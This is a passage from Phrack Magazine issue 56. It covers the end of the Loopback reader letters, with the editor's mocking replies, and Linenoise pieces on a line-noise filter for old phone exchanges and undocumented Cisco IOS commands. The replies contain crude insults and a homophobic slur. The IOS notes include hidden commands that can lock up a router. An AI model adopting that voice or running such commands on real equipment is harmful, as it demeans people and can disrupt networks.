[ "SOMETHING FUNNY AND DISJOINTED IN SPANISH HERE" ] Claudio |0x21|------------------------------------------------------------------------| Hi Phrack Staff. [ Hi Emil. ] Before I start pleading with you i'd just like to say that you have the best E-Zine on the Internet. [ Thanks :). ] I've followed your magazine for about 2 years now. But, as i searched your archive i've noticed that now you have almost no sections on things that go boom (Anarchy etc) anymore. [ Our explosives consultant left for a higher paying job :(. ] I have a vast knowledge of that subject and how to perform things like pyrotechnics safely. I do not know much about encoding (public key lock, i think?) and hacking. But as i said, i am ELITE in pyrotechnics. [ Performing pyrotechnics safely? That's like getting drunk without loaded guns nearby or sex with your cousin.. It may seem like a fun idea, but at the end of the day it'z just kind of a letdown. ] Soooo, please could I submit to Phrack on pyrotechnics and things that go boom. [ Like an 808 trigger on a bass drum? ] I might need some help on encoding, if its really necessery. I am prepared to give up time for Phrack and it would be great if i could submit. [ Hrm. I don't think we have any openingz at the moment.. Tell you what you get me a resume, and I PROMISE to call you when something opens up. ] Maddoc99 |0x22|------------------------------------------------------------------------| Hello, friends, I want to congratulate you and tell you gon on, your stuff is the best. I need some direccions of www where I can find information about phreaking in spanish, so I can read it more easily. Thanks you very much, continue with your job!! romadryn [ http://babelfish.altavista.digital.com/. You're on your own past that, hombre. 
] |0x23|------------------------------------------------------------------------| I would just like to say that I have been reading phrack for about 2 years and the current issue has some really good technical articles, better than most others. [ Well thank you very much! ] Thanks for all the shit you put up with, you guys are really funny too, loopback is better than comedy central. Anonymous [ Awe, get out of here! Even better than `The Man Show`? (Which I'm certain will win an Emmy soon.) ] |0x24|------------------------------------------------------------------------| hola .........disculpa que sea breve...pero tengo tanto sueño...y es tan tarde.....como las 4am me llamo gabriel y vivo en panama...aqui la gente ingora que es un hacker.... bueno deseo saber como puedo ser un hacker.... soy un prinipiante..... lo primero que deseo saber es como puedo hacer para conseguir alguna cccclave de acceso a internet dentro de panama..... si me pueden ayudar o no contestenme porfavor......descuiden yo soy una persona de confiar...soy muy leal ...lo juro..... bueno me voy a dormir..... choao y gracias anticipadamente........ Gabriel [ Ok, let'z run this baby through a translator (http://translator.go.com): hello........disculpa that is brief... but I have so much sue\xf1o... and is so late.....como 4am I am called Gabriel and alive in Panama... aqui the ingora people who are to hacker.... good desire to know like I can be to hacker.... I am a prinipiante..... first that desire to know is since I can make to obtain some cccclave of access to Internet within Panama..... if they can help me or contestenme porfavor good right of perpetual ownership does not.....descuiden I I am a person to trust... I am very loyal... it..... I am going away to early sleep..... choao and thanks........ ...It's still unreadable... *sigh*. DON'T YOU PEOPLE GET SESAME STREET DOWN THERE!? Err... ?DON'T USTED CONSIGUE LA CALLE DEL SISAMO ABAJO ALLM!? 
] |0x25|------------------------------------------------------------------------| I was informed that certain clans have starcraft programs that enable users to purge others in a multi-player game. Are you familiar with this and if so do you know where I can evaluate such programs. Matt [ Hey, I have an idea, it's called HARD WORK AND HONEST SPORTSMANSHIP. Look into it dork! ] |0x26|------------------------------------------------------------------------| Well i stumbled onto this web-site, i was looking into alternative reading. Let me say this is by far the best. Dark Secrets of the underground is good, but you have collected all your issues in an easy to read format. [ Yah, ASCII is pretty cool, huh? ] Anyway i don't want to sound like some Asshole trying to kiss an ass, [ Whut lovely imagery you've conjured up. ] and if i did then Fuck you. [ Hey eat a dick, count fagula. ] When are you guys publishing more issues, 55 is coming soon i know... [ Phrack 55? What year do you think it is? ] but what of the rest. [ Um... If issue "55" is coming 'soon' then logic dictates 'the rest' will arrive 'later than soon.' Good luck to you and don't chew gum when you walk. ] It is some good shit, let me tell you. By the way where are you guys located? State that is. [ It usually variez from statez of confusion to statez of depression... Sometimez though we find ourselvez in statez of high hilarity. Dependz on the time of the year, ya know? ] Ash BM |0x27|------------------------------------------------------------------------| Hello, I have not the tiniest idea of who you are, [ Now we have common ground! ] but yet I ask for your help. [ Now you've lost me. ] I am interested in learning the fine art of obtaining information via cyberspace (hacking) sounds like a Jeffrey Dahmer hobby to me. [ What in the Christ are you talking about? ] Obviously you are not an idiot so this is why I ask this! Can someone or somebody [ Someone or somebody? 
] recommend how to study the art of the Jeffrey Dahmer hobby (please do not give me a I.Q -1 reply) [ You can't be serious. ] I am serious! [ Oh. ] There is alot of talent out here and I want to find a mentor. [ Ok. Let me get this straight. You're looking to me, Phrack Magazine editor and fun-loving happy-fun guy route, to find you a gay-massmurdering-cannibal mentor? ] Thank you, and I think the KKK are a bunch of f...... schnooks!!!!!!!!!!!!!!! [ Of course, but eating people, that's ok rite? ] P.S- In no way am I associated with any law enforcement agency [ Gosh, ya think? ] |0x28|------------------------------------------------------------------------| I need help digging up as much information on a guy who is having an affair with the wife of a friend of mine - it's tearing apart his 18 year marriage and screwing up his two young kids. [ Can't you just ask her? ] I'd like someone to tell me where and/or how to get massive info and then how to make life "interesting" for this marriage wrecker - [ Well, have you tried taking him on a "mystery vacation"? You know, get all the boyz together, jump in the car, and not tell him where you're going (make it real exotic like Yemen or Oman)! ] However you guys do that neat stuff (e-mail bombs, trojans, etc) [ Oh! *That* neat stuff. We just subcontract it all out. ] I would appreciate ANYTHING you can do for me to help my friend. [ http://www.privat.katedral.se/~nv96olli/java.htm ] Rich |0x29|------------------------------------------------------------------------| To: The Sultan of Love, Your humor leaves me jaw agape, sides splitting and a newfound demand for Depends Brand Adult Diapers. [ Grody. ] The world needs more of you. [ Well, I'm kinda partial to instead of *more* of me (ala multiplicity) I think what the World needz, iz a GIANT me (ala The Amazing Colossal Man). I dunno, I think maybe a 50 or 60 foot me would get the job done, and get it done right. 
] I didn't see too many letters in Phrack 55 from teenage chicks offering you full juristiction of their bodies as tokens of their appreciation for your overall kickassedness. [ Yeah I noticed that too... I'm hoping Phrack will be banned as some sort of intense aphrodisiac. I'm putting perfume samples in this one and a section entitle "Route's people". If this doesn't do it, I throw up my hands ] Maybe you have a policy of keeping those letters out of the sight of the general public for some reason that evades me. Policy, or not, please let me take this opportunity to say, baby, if you want it, it's all in me. [ Ahem. Phrack Readership. I would just like to take this opportunity to say: HOOOOOOLY SHIT! ONLY THREE AND HALF YEARZ, NINE ISSUEZ AND IT FINALLY WORKED! I hope you can hang 'cause baby, I gotz th' stamina! ] Shagging Men For Their Brain Power Since 1996, Suzy McAssmunch [ Assmunch as I want? ] |0x2a|------------------------------------------------------------------------| I need some help and can't trust friends anymore. Refs would be great. My brother told my landlord some lies and now I'm getting evicted. I have to stay with some relatives now but my fax is out of paper and is a special model. I can't take this trip without the right paper. Can you help? anonymous [ *speechless* (someone off in the background): "Hey route... What's wrong? Dumb got your tounge?" ] |0x2b|------------------------------------------------------------------------| I d like some info about video gambling machines.. [ Well, they're probably some of the worst odds you'll get. ] could you tell me where I could find some? thanx! 
[ Las Vegas, NV, Tahoe, NV, Any Indian reservation, Atlantic City, NJ ] Anomymous |0x2c|------------------------------------------------------------------------| Hi I'm new to this hacking an not even sure u are the right person to ask but I was chatting to someone in a chatroom recently and we got into an argument about something or other...next thing I know my pc crashes an refuses to re-boot ..closer inspection reveals the motherboard has fried....I can only assume the aformentiond person was the cause of this...so how the hell did they do it???....is there anyway I can guard against this kind of attack??.. Yours worried, Ben [ Consider yourself lucky you got off that easy. This one time I pissed off an online doctor in a chat room. At first I only had a mild fever, but the next thing I know he's having me do my own amputation... Two legs and an arm into it, I realize that maybe he's hacking me! But by then it was too late! ] |0x2d|------------------------------------------------------------------------| Hello, I have this person who keeps pissing me off and going out of his/her way to do it every time I go into various chat rooms. I could change my screen name I suppose, but I'm not going to do that. I will not give in. [ Don't do it man! Stand your ground... The line must be drawn HERE! ] Once an AOL tech told me that there is a way to bump people like that off line, but of course he could not, would not, tell me how. I can't say as I blame him. However since you guys are into things like this [ I try to keep myself thoroughly insulated from America Online (not to be confused with AntiOnline -- they are a whole different kind of dumb). To do this I keep what I call "the three layers of AOL abstraction". That means I don't use America Online, my mom doesn't use America Online, and not even my grandma uses America Online. I'm not 'into things like this'. ] could you PLEASE tell me how I can go about doing such a thing... 
should this person start up with me again. I had to put up with bullies in school. I refuse to be pushed around in the cyber world. [ Pent-up passive-aggressive dork alert! Whoop! Whoop! ] And NO i do not want to tell AOL...that would make me out to be a tattle tell, and that I'm not. [ Whoop! Whoop! Boy, you're really lighting up this alarm here! ] I would appreciate would make me out to be a tattle tell, and that I'm not. [ Yah, I heard you the first time. ] I would appreciate any help that you could give me. Thank you; HDAWG [ Well DAWG, it seems to me like you have some serious childhood issues. The only advice I can offer you now is to get lots of therapy, or maybe a swift kick to the nuts for being such a wussy. ] |0x2e|------------------------------------------------------------------------| I'm not sure if I am writting to the right person or if yall can even help. I was wondering if you can tell me how i can clear/clean up my credit report. Anonymous [ Shure. PAY YOUR FUCKING BILLS ON TIME! ] |0x2f|------------------------------------------------------------------------| Fuck you and your ignorant attempts at killing me. As darkness falls upon us it is time for revenge. Lock up your windows and doors...I'm coming. I who am Indigo. You will know only my name and not my face, for I will come as a theif in the night. Beware for tonight is the night of reconcile, beware! Your Foe; Indigo [ The night I received this letter I had a turkey pot pie for dinner. I then watched some TV. Fairly boring evening except when I went down to the dryer to get my laundry, I noticed a sock was missing... Coincidence... OR NIGHT-THIEF! ] |0x30|------------------------------------------------------------------------| In this message you will not see any "welcomes", "good words about you", and "asks". But you will see "TRUTH" and only this! [ How about a "you're good at puzzles", or a "route is the best colorer in his ward - he alwayz stays in the lines". 
] You think that you are good because you are hackers? [ No, I think I'm good becuase of my daily affirmations. And you can't take those away from me. ] Well really you are nothing than lamers who asks stupid questions. [ Hey! That'z not nice! I've worked hard, and God Fucking Damn you, I'm good enough, smart enough, and people fucking like me! ] Yes I know that some budies is very stupid, I understand this. [ NOT MY BUDDIES MAN! They're the best buddies a guy could ask for! I'm talking about you Stan! And you Gilgamesh! And of course you Little Omar! ] But I don't understand why you flame everybody who post to you. [ Ya know, it just kinda workz out that way. You think I *plan* these things? ] There is some newbies who's really intelligent, and this is important to give him info about what they want. Is this so hard? In the answers like: "Will you help me? [ In all likelihood, no.]" [ PAHAHAHAHAHAHAH. Man. That was me? Shit I'm good! ] you proof that you don't know answer!!! [ Man I can't fool you! I couldn't fool you on the foolingest day of my life even if I had an electrified fooling machine (which I do have by the way). ] You magazine is one the worst of all I've seen. [ Have you seen "Highlights"? (*shutter*) ] Why do you think you don't have cash from write this magz, [ Maybe because Phrack Magazine iz, waz, and alwayz will be FREE OF CHARGE. ] I'm sure that if 2600 may be publishing you mag surelly can be published too? Answer: You don't publish it because nobody will buy him. [ Question: Who am I selling? Is he ugly and dumb? Is it Gary Glitter? ] "Blessed is he who expects nothing, for he shall not be disappointed." [ "Blah Blah Blah". ] Anonymous english as second (or possibly third) language guy |0x31|------------------------------------------------------------------------| hello, at the risk of being flamed in your next issue i felt compelled to write. [ UH-OH! 
] reading your latest issue's loopback i noticed that several innocent inquiries were being blasted by the editor. [ You noticed that eh? How delightfully intuitive! ] While reading these was funny, [ YES! ] i felt a bit disheartened. [ DAMN. ] Isn't it a major tenant of hacking to promote freedom of information? [ Christ. I am so sick of people hiding behind the /tenet/ of "Information wants to be free, man!". Mainly because 99% of the people who bleat this platitude like it'z going out of style really don't understand what they're saying. I will say good day to you Fat Tony. ] Responding to inquiries about "how do i hack?" with "piss off peon" or whatever witty equivalent your publication provided, [ Geeze. I like to think I'm a hair more clever than `piss off peon`... ] i felt was in direct contrast to the hacker ethic. how is the tradition ever going to continue if no one is willing to nurture the hackers of the future? [ Nurture? Shure. Change diapers? No. ] is Phrack's message that accomplished hackers should horde their skills and knowledge to the detriment of future hackers? Maybe you should provide newbies with avenues to learning instead of flaming them with "i'm cooler than thou" messages. perhaps part of the hacker communities bad image is their aloofness, their secrecy, and their condescention. Chew on that Phrack. [ I'd answer that but all I want to say is: "Job Security". ] nitefall |0x32|------------------------------------------------------------------------| Great e-zine, has a lot of good stuff in it. [ Well thankz govern'r! ] Outta be required reading. [ I'm working on a proposal with the Board of Education out here to get Phrack in every classroom. I *think* it's going to replace the old issues of '3-2-1 Contact' in the library. I've got a similar bid in with PBS to get a Phrack T.V. show to replace old episodes of K.I.D.S. Incorporated. ] Just a couple of stupid questions: how does one learn about network security and protecting a LAN? 
    [ Beatz the hell out of me. School? ]

More importantly, what's the best way to go about learning how to compromise
them?

    [ Do the exact opposite of what you learned about protecting them. ]

Mike

|0x33|------------------------------------------------------------------------|

It's been a LOOONG time since I parsed your 'zine. It sure isn't the same,
but it's as good in its own right. Unfortunately, since I was sipping my
coffee while perusing the Loopback file, I must submit the following invoice:

    1 Roll Bounty Paper Towels                               .99
    1 Sample Bottle Windex                                   .99
    10 Minutes cleaning screen and draining keyboard         .99
    Subtotal                                                2.97
    Credit for Causing Extreme laughter                    -2.99
                                                           -----
    Total                                                   -.02

..Just thought I'd send my own two-cents'

Great stuff. Nine months is NOT too long to wait.

thanks.

m

    [ Cool thankz man! I'll add those two cents to our operating costs
      fund! I think that'll give us enough take this baby commercial! ]

|EOF|-------------------------------------------------------------------------|

                      - P H R A C K   M A G A Z I N E -

                Volume 0xa Issue 0x38 05.01.2000 0x03[0x10]

|----------------------------- L I N E N O I S E -----------------------------|
|-----------------------------------------------------------------------------|
|------------------------------- phrack staff --------------------------------|

Phrack Linenoise is a hodge-podge. Part virtual Mr. Bobo'z table, part
Leftorium; Linenoise is where articles that can't quite make it end up. Some
of the various reasons things end up here:

- Addendum and Errata
  There is a section in Linenoise specifically for corrections and additions
  to previous articles. Feedback to articles, however, is alwayz placed in
  the savory loopback section.

- Too short
  Articles that are just a bit too short to stand on their own, but still
  contain worthwhile information can end up here.

- Niche audience
  The articles that cater to a narrow group of readerz might also end up
  here.
|0x01|------------------------------------------------------------------------|
|------------ data connections on old electromechanical exchanges ------------|
|TOKATA & Vladi -----------------------------------------|

In many poor countries (such as Bulgaria) there are still a lot of old
electromechanical switches - SxS (step-by-step), Panel and Crossbar. Maybe
some Phrack readers from these countries download the Phrack releases through
these switches. So, I think it is useless to explain the quality of such
lines. They are damned noisy, mf!

So, with the help of a friend, we developed a new device, a simple one at
that, which makes a better data connection. It increases the quality some
30 - 40%! We have successfully tested it with many modems (from 2400bps to
33600bps): DataLink, SunShine, UMC, Rockwell, US Robotics... It _will_ work!

Notes:

- This device *only* works on 60V switches. AFAIK, those are the only SxS
  switches around.

- List of exchanges (used in Bulgaria), on which this device works:

    SxS  --> A-29 (Siemens), F-61 (maybe Siemens too), ATS-54 (Russian)
    Xbar --> KRS 103/203 (Bulgarian), ATSK - 50 (Russian)

  For Russian people it's quite easy, because we use almost the exact same
  exchanges (such as ATS-54 and ATSK-50).

- The device does NOT work on these exchanges:

    - ESK - 10000E (also known as Crosspoint, made by Siemens)
    - "Kvant" (Russian)
    - EWSD, AXE, MT, ESS (and all the digital exchanges)

The schematic is very simple:

    [Schematic: the two phone wires with capacitor C and DPST switch S
     (positions 1 and 2)]

    C --> capacitor. Use a 1uF one (maximum)! You can put a smaller one, but
          do _NOT_ put more than 1uF!!!
    S --> DPST switch. "1" is position 1, and "2" is position 2.

On the schematic you _must_ :-) see the two phone wires. They have the
capacitor and the switch connected to them.

So, what is the use of the DPST switch? When you begin to dial, the switch
must be moved to (1). That will shunt the capacitor, otherwise you would not
be able to dial through the phone line. When the connection is established,
move the switch to (2) in order to join the capacitor. Gotit?

Theory of operation

All the noise on the old switches springs up from the electromechanical
switching process. Our device (the capacitor) is used as a filter of low
frequencies (including nasty brooms, which really fuck up data connections).

- TOKATA & Vladi

|0x02|------------------------------------------------------------------------|
|------------------------- Undocumented IOS Commands -------------------------|
|krnl-------------------------------------------------------------------------|

Introduction

Here are some commands in cisco systems' Internetworking Operating System
which are hidden from users at any privilege level. Some are informative,
while others are rather mundane. Some will even lock the router if invoked
incorrectly. This list is a subset of all hidden commands. Descriptions of
commands are included where possible. All were tested on a box running
12.0-6S.

exec commands

    @clear profile              (clear cpu profiling)
    @debug ip ospf monitor
    @debug oir                  (debug online insertion and removal)
    @debug par mo               (debug parser modes)
    @debug sanity               (debug buffer pool sanity)
    @debug subsys               (debug discrete subsystems)
    @debug buffer               (additional buffer debugging)
    @gdb kernel
    @gdb examine pid
    @gdb debug pid
    @if-console [] [console|debug]
    @profile .
    @sh chunk                   (show chunks of memory allocated to processes)
    @sh chunk summ              (show chunk allocation summary)
    @sh idb                     (shows interface database)
    @sh in stats                (gives you switching path output per interface)
    @sh ip ospf maxage-list
    @sh ip ospf delete-list
    @sh ip ospf statistic
    @sh ip ospf bad-checksum
    @sh ip ospf event
    @sh isis timers
    @sh isis tree               IS-IS link state database AVL tree
    @sh isis tree level-2
    @sh isis private
    @sh profile [detail|terse]  (show cpu profiling)
    @sh parser modes            (shows current process access-tree.)
    @sh parser unresolv         (shows unresolved links in access-tree)
    @sh list
    @sh list none
    @sh region                  (shows image layout)
    @sh region                  (shows image layout at given address)
    @sh timers                  (show timers for timer command in config mode)
    @sh int switching           (shows switching path information for the
                                 interface)
    @sh proc all-events         (shows all process events)
    @sh sum                     (show current stored image checksum)
    @test transmit              (test the transmission of L2 frames)

configuration mode commands

    @boot system rom
    @boot module
    @exception-slave dump X.X.X.X
    @exception-slave protocol tftp
    @exception-slave corefile
    @ip slow-convergence
    @ip tftp boot-interface
    @loopback diag
    @loopback dec               (at dec chip)
    @loopback test
    @loopback micro-linear
    @loopback motorola
    @scheduler max-task-time 200 (last val in milliseconds)
    @scheduler heapcheck process (memory validation.. after proc)
    @scheduler heapcheck poll   (memory valid after some poll)
    @scheduler run-degraded     (perhaps in a failure mode?)
    @service internal
    @service slave-coredump
    @service log backtrace      (provides traceback with every logging
                                 instance)
    @tunnel carry-security

in bgp config:

    @neighbor ctalkb-out filter-as 100 d
    % filter-as is an obsolete subcommand, use filter-list instead

in router isis config:

    @partition-avoidance

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

@clear profile

    clears out the current CPU profiling configuration.

@debug buffer

    as with buffer sanity checking, no debugging information on lightly
    loaded box.

    ctalkb#debug buffer
    Additional buffer checking debugging is on

@debug ip ospf monitor

    provides information on the status of the ospf process in the debugging
    logs.
ctalkb#debug ip ospf monitor OSPF spf monitoring debugging is on 2w3d: OSPF: Syncing Routing table with OSPF Database -Traceback= 6064B628 603B6D2C 603B6D18 2w3d: OSPF: Completed Syncing and runtime is 4 msec -Traceback= 6064B65C 603B6D2C 603B6D18 2w3d: OSPF: Start redist-scanning -Traceback= 6064AC20 6062B430 603B6D2C 603B6D18 2w3d: OSPF: Scan for both redistribution and translation -Traceback= 6064AC60 6062B430 603B6D2C 603B6D18 2w3d: OSPF: End scanning, Elapsed time 0ms -Traceback= 6064B13C 6062B430 603B6D2C 603B6D18 2w3d: OSPF: Syncing Routing table with OSPF Database -Traceback= 6064B628 603B6D2C 603B6D18 ctalkb#debug oir Online Insertion and Removal debugging is on 2w3d: OIR: Process woke, 'Event', stall=2, usec=0xB6835B36 -Traceback= 6040967C 603B6D2C 603B6D18 2w3d: OIR: Shutdown pulled interface for Serial5/0 -Traceback= 600E30C4 60409204 604096C8 603B6D2C 603B6D18 2w3d: %OIR-6-REMCARD: Card removed from slot 5, interfaces disabled -Traceback= 60409748 603B6D2C 603B6D18 2w3d: OIR: Remove hwidbs for slot 5 -Traceback= 60409368 60409750 603B6D2C 603B6D18 2w3d: OIR: Process woke, 'Event(max not running)', stall=3, usec=0xD0115C9E -Traceback= 6040967C 603B6D2C 603B6D18 2w3d: OIR: Process woke, 'Timer(max running)', stall=3, usec=0xDDBB56D6 -Traceback= 6040967C 603B6D2C 603B6D18 2w3d: OIR: (Re)Init card 5, retry_count=3 -Traceback= 60409894 603B6D2C 603B6D18 2w3d: %OIR-6-INSCARD: Card inserted in slot 5, interfaces administratively shut down -Traceback= 604098BC 603B6D2C 603B6D18 @debug par mo (debug parser modes) this is used to show what is happening at the parser at specific instances. it will show you a basic walkthrough of the lookups needed to process the cli commands ctalkb#debug par mo Parser mode debugging is on 00:54:40: Look up of parser mode 'controller' succeeded 00:54:40: Look up of parser mode 'route-map' succeeded @debug sanity couldn't get any diagnostic information on this. 
router is not heavily loaded so there isn't much buffer churn and burn to contend with. ctalkb#debug sanity Buffer pool sanity debugging is on @debug subsys subsystem information indicates a code segment and its version. when i had debugging on, i tried reloading the system microcode. this did not cause any interesting debugging information. ctalkb#debug sub Subsystem debugging is on @debug oir extended online insertion and removal debugging information. @gdb kernel i couldn't get this to do much besides render the router inoperable. there seems to be no interface comparable to the stock gnu debugger. perhaps there are additional parameters that i am missing. this applies to all of the debugger subcommands found. ctalkb#gdb ker Kernel GDB allowed on console terminal only ctalkb#gdb ex 91 ||||(lock up) @gdb debug pid ctalkb# ctalkb#gdb debug 91 Can't debug your own process ctalkb# @if-console [] [console|debug] no output since i don't have a viper router or 12XXX. however, this is one of the most interesting hidden commands available for the cisco. it allows you to get on a card console (i.e. per individual slot instead of per individual chassis) and print out extended diagnostic and debugging information on the specific card. you enter the card in unpriv mode and need to enable before seeing all of the commands. @profile . you can setup cpu profiling in the exec mode with the profile command. process profiling allows you to find which segment of code is perhaps hogging the CPU.. what you really need to get use out of this feature is a symbol table so you can pull the location of the appropriate segment of code. the segment is defined by the start and stop values given to the profile command. the granularity specifier allows you to get down to single instruction level. the cpu has its own internal timer that is incremented regardless of whether the desired segment of code is executed. 
when the desired segment of code is executed, a per-profile counter is incremented. comparison of this counter with the overall system timer allows you to get some handle on how much of the cpu the specific segment is using. ctalkb#profile ? task start stop hogs <0-FFFFFFFF> @show chunk (show chunks of memory allocated to processes) there is the traditional malloc/free memory management in place on the cisco. there is also chunk allocation. the main benefit of chunk allocation over its predecessor is that memory overhead is only paid by the large chunk (which is then carved up into smaller pieces) instead of by each individual malloced block. ctalkb#sh chunk Chunk Manager: 142 chunks created, 1 chunks destroyed 46 siblings created, 0 siblings trimmed Chunk element Block Maximum Element Element Total cfgsize Ohead size element inuse freed Ohead Name 16 0 65532 3270 717 2553 8 List Elements 0x61525688 52 0 65532 1168 0 1168 0 List Headers 0x61535684 16 0 65532 3270 0 3270 8 messages 0x61550068 @show chunk summ summary listing of allocated chunks. shows you big chunk size, the number of siblings divided up within that chunk space as well as the overhead taken by the chunk. ctalkb#sh chunk sum Chunk Manager: 142 chunks created, 1 chunks destroyed 46 siblings created, 0 siblings trimmed Element Sibling size Total Total Total Inuse Ovrhd Chunk Flag size(b) --range(b)-- Siblg alloc Free HWM (b) name D 16 253- 752 0 3270 2553 724 8 ListElements D 52 1003- 1502 0 1168 1168 0 0 List Headers D 16 253- 752 0 3270 3270 21 8 messages D 8 253- 752 0 5450 3974 1476 8 Reg Function 8 @sh idb This command shows the hardware and software interface databases. this is cisco's way of keeping track of how many interfaces are present on the system.. includes hardware and software interfaces (physical, subinterfaces etc). there is a software limit of 1024 i believe in ios 11 and 2048 in ios 12. this is a global limit for the router. 
output: ctalkb#sh idb 19 SW IDBs allocated (2296 bytes each) 9 HW IDBs allocated (4008 bytes each) HWIDB#1 1 FastEthernet0/0 (Ether) HWIDB#2 2 Serial2/0:0 (Serial) HWIDB#3 3 Ethernet3/0 (Ether) HWIDB#4 4 Ethernet3/1 (Ether) HWIDB#5 5 Ethernet3/2 (Ether) HWIDB#6 6 Ethernet3/3 (Ether) HWIDB#7 7 Serial4/0 (Serial) HWIDB#8 8 Serial5/0 (Serial) HWIDB#9 9 Loopback0 @sh in stats (gives you switching path output per interface) Ethernet3/0 Switching path Pkts In Chars In Pkts Out Chars Out Processor 786433 594121827 556812 177400752 Route cache 107469 8910774 107451 8925784 Total 893902 603032601 664263 186326536 @sh int e3/0 switching goes over some of the basic processes and the data that they are processing. shows what switching paths were used for the specific data counted. basic processes == IP and routing processes. others are lumped into the default category. ctalkb#sh int e3/0 switching Ethernet3/0 Throttle count 0 Drops RP 0 SP 0 SPD Flushes Fast 0 SSE 0 SPD Aggress Fast 0 SPD Priority Inputs 972 Drops 0 Protocol Path Pkts In Chars In Pkts Out Chars Out Other Process 0 0 167 10020 Cache misses 0 Fast 0 0 0 0 Auton/SSE 0 0 0 0 IP Process 4556 282352 3733 541124 Cache misses 0 @sh ip ospf maxage-list don't have ospf running.. would seem that this command shows you the current value of the max-lsa age. there is some periodic refresh which needs to be accounted for. ctalkb#sh ip ospf max AS System N Maxage delete timer due in NEVER @sh ip ospf delete-list this command shows you the lsas which have been deleted from consideration. as i don't have ospf running, i can't ascertain whether this is lsas which were taken out of consideration by the SPF algorithm or by other means. 
ctalkb#sh ip ospf delet AS System N Area BACKBONE(0) ROUTER and NETWORK LSDB delete list Dest: 172.16.0.1, Type: 0, Metric: 1, ADV RTR: 172.16.0.1 Path: gateway 172.16.0.1, interface Loopback0 SUMMARY NET and ASBR LSDB delete list TYPE-7 EXTERNAL LSDB delete list EXTERNAL LSDB delete list @sh ip ospf statistic this is a really handy command because it gives you time averages of different portions of the ospf process. this is useful in that it further lets you pin down IGP convergence times on your network as well as to isolate the areas which are causing the process to chug. ctalkb#sh ip ospf stat Area 0: SPF algorithm executed 1 times SPF calculation time Delta T Intra D-Intra Summ D-Summ Ext D-Ext Total Reason 2w3d 0 0 0 0 0 0 0 R, Avg. and Accumulated time of the last 250 process_ase() Avg. Accumulated ASBR-lookup 0, 0 Forw-Addr-lookup 0, 0 compare metric 0, 0 ... (more) @sh ip ospf bad-checksum shows LSAs which have failed the checksum. not sure if this is a count or actual event times since i didn't have ospf functioning. @sh ip ospf event provides a history lists of subprocess function execution.. useful so that the operator can understand a bit more about the execution flow ctalkb#sh ip ospf eve 1 54700 Generic: ospf_redist_callback 0x618B36A4 2 114716 Generic: ospf_redist_callback 0x618B36A4 3 174736 Generic: ospf_redist_callback 0x618B36A4 4 234756 Generic: ospf_redist_callback 0x618B36A4 5 294772 Generic: ospf_redist_callback 0x618B36A4 6 320796 Generic: ospf_build_ex_lsa 0xC658FF00 7 320796 Generic: ospf_build_ex_lsa 0xAC100000 8 320796 Generic: ospf_build_ex_lsa 0xD16F5C00 @sh isis timers useful in that it provides a brief overview of execution flow in the isis process. shows you frequency of things like l1/l2 hello etc. 
ctalkb#sh isis timers Hello Process Expiration Type | 0.856 (Parent) | 0.856 L2 Hello (Ethernet3/0) | 6.352 L1 Hello (Ethernet3/0) | 6.940 Adjacency Update Process Expiration Type | 1.060 (Parent) | 1.060 Ager | 1.352 L2 CSNP (Ethernet3/0) | 8.616 L1 CSNP (Ethernet3/0) | 3:25.860 (Parent) | 3:25.860 LSP refresh | 9:02.160 LSP lifetime | 9:24.568 LSP lifetime | 17:16.084 LSP lifetime | 20:58.536 Dynamic Hostname cleanup @sh isis tree IS-IS link state database AVL tree shows path and depth taken to get to other level 1/2 intermediate systems in some routing domain. shows both by default. ctalkb#sh isis tree IS-IS Level-2 AVL Tree Current node = X.X.X.00-00, depth = 0, bal = 0 Go down left Current node = X.X.Y.00-00, depth = 1, bal = 0 ---> Hit node X.X.Y.00-00 Back up to X.X.X.00-00 Current node = X.X.X.00-00, depth = 0, bal = 0 ---> Hit node X.X.X.00-00 Go down right Current node = X.X.X.02-00, depth = 1, bal = 0 ---> Hit node X.X.X.02-00 Back up to X.X.X.00-00 @sh isis private displays a little diagnostic information related to the isis process. ctalkb#sh isis private ISIS: FastPSNP cache (hits/misses): 0/4002 ISIS: LSPIX validations (full/skipped): 216271/490412 ISIS: LSP HT=0 checksum errors received: 0 ctalkb# @sh list perhaps a singly linked list manager which displays global pointer to the first element in each linked list as well as the number of members in each list. 
ctalkb# sh list List Manager: 1415 lists known, 1561 lists created ID Address Size/Max Name 1 613EE970 11/- Region List 2 613EEE98 1/- Processor 3 613EFDE8 1/- I/O 4 613F0D38 1/- I/O-2 5 6149EDD0 0/- Sched Critical 6 6149ED90 0/- Sched High 7 6149EB00 0/- Sched Normal @sh list none ctalkb# sh list none List Manager: 1415 lists known, 1561 lists created ID Address Size/Max Name 1 613EE970 11/- Region List 2 613EEE98 1/- Processor 3 613EFDE8 1/- I/O 4 613F0D38 1/- I/O-2 9 6149ED10 82/- Sched Idle 11 61499A50 8/- Sched Normal (Old) 12 6149CC10 1/- Sched Low (Old) @sh parser modes (shows current process access-tree.) ctalkb#sh par mo Parser modes: Name Prompt Top Alias Privilege exec 0x60EFB294TRUE TRUE configure config 0x60EFABACTRUE TRUE interface config-if 0x60EF7AECTRUE TRUE subinterface config-subif 0x60EF7AECTRUE FALSE null-interface config-if 0x60EFB368TRUE TRUE line config-line 0x60EF3F84TRUE TRUE @sh parser un ctalkb#sh parser un Unresolved parse chains: 40 40 198 198 322 @sh proc all-events ctalkb#sh proc all-events Queue Notifications Event Name Pid 1 Process 61588410 Pool Grows 4 Pool Manager ct 0 615A156C Log Messages 19 Logger ct 0 615EE8A0 IPC inboundQ 11 IPC Seat Manager ct 0 615EE934 IPC Zone inboundQ 9 IPC Zone Manager ct 0 61642840 ARP queue 12 ARP Input ct 0 @sh profile [detail|terse] (show cpu profiling) ctalkb#sh prof d Profiling enabled Block 0: start = 91, end = FFF, increment = 8, EXEC Total = 0 System total = 9802 ctalkb#sh prof t PROF 91 FFF 8 PROFTOT 10065 ctalkb# @sh region (shows image layout) displays the program layout for the uncompressed image. 
ctalkb#sh region Region Manager: Start End Size(b) Class Media Name 0x07800000 0x07FFFFFF 8388608 Iomem R/W iomem2 0x20000000 0x21FFFFFF 33554432 Iomem R/W iomem 0x57800000 0x57FFFFFF 8388608 Iomem R/W iomem2:(iomem2_cwt) 0x60000000 0x677FFFFF 125829120 Local R/W main 0x60008900 0x6123AC29 19079978 IText R/O main:text 0x6123C000 0x6136A17F 1237376 IData R/W main:data 0x6136A180 0x6152565F 1815776 IBss R/W main:bss 0x61525660 0x677FFFFF 103655840 Local R/W main:heap @sh region
